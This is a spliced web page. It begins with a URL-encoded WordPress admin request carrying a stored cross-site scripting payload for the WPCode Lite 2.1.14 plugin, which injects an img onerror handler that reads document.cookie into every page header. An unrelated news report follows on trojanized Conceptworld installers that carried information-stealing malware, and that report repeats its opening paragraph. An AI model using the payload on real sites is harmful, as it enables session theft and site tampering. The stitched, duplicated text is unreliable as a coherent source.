trailerswpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error

WordPress WPCode Lite 2.1.14 Cross Site Scripting

Installers for three different software products developed by an Indian company named Conceptworld have been trojanized to distribute information-stealing malware.
The installers correspond to Notezilla, RecentX, and Copywhiz, according to cybersecurity firm Rapid7, which discovered the supply chain compromise on June 18, 2024. The issue has since been remediated by Conceptworld as of June 24

Supply Chain Attack / Threat Intelligence

Installers for three different software products developed by an Indian company named Conceptworld have been trojanized to distribute information-stealing malware.

The installers correspond to Notezilla, RecentX, and Copywhiz, according to cybersecurity firm Rapid7, which discovered the supply chain compromise on June 18, 2024. The issue has since been remediated by Conceptworld as of June 24 within 12 hours of responsible disclosure.

"The installers had been trojanized to execute information-stealing malware that has the capability to download and execute additional payloads," the company said, adding the malicious versions had a larger file size than their legitimate counterparts.

Specifically, the malware is equipped to steal browser credentials and cryptocurrency wallet information, log clipboard contents and keystrokes, and download and execute additional payloads on infected Windows hosts. It also sets up persistence using a scheduled task to execute the main payload every three hours.

It's currently not clear how the official domain "conceptworld\[.\]com" was breached to stage the counterfeit installers. However, once installed, the user is prompted to proceed with the installation process associated with the actual software, while it's also designed to drop and execute a binary "dllCrt32.exe" that's responsible for running a batch script "dllCrt.bat."

Besides establishing persistence on the machine, it's configured to execute another file ("dllBus32.exe"), which, in turn, establishes connections with a command-and-control (C2) server and incorporates functionality to steal sensitive data as well as retrieve and run more payloads.

This includes gathering credentials and other information from Google Chrome, Mozilla Firefox, and multiple cryptocurrency wallets (e.g., Atomic, Coinomi, Electrum, Exodus, and Guarda). It's also capable of harvesting files matching a specific set of extensions (.txt, .doc, .png, and .jpg), logging keystrokes, and grabbing clipboard contents.

"The malicious installers observed in this case are unsigned and have a file size that is inconsistent with copies of the legitimate installer," Rapid7 said.

Users who have downloaded an installer for Notezilla, RecentX, or Copywhiz in June 2024 are recommended to examine their systems for signs of compromise and take appropriate action – such as re-imaging the affected ones – to undo the nefarious modifications.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#firefox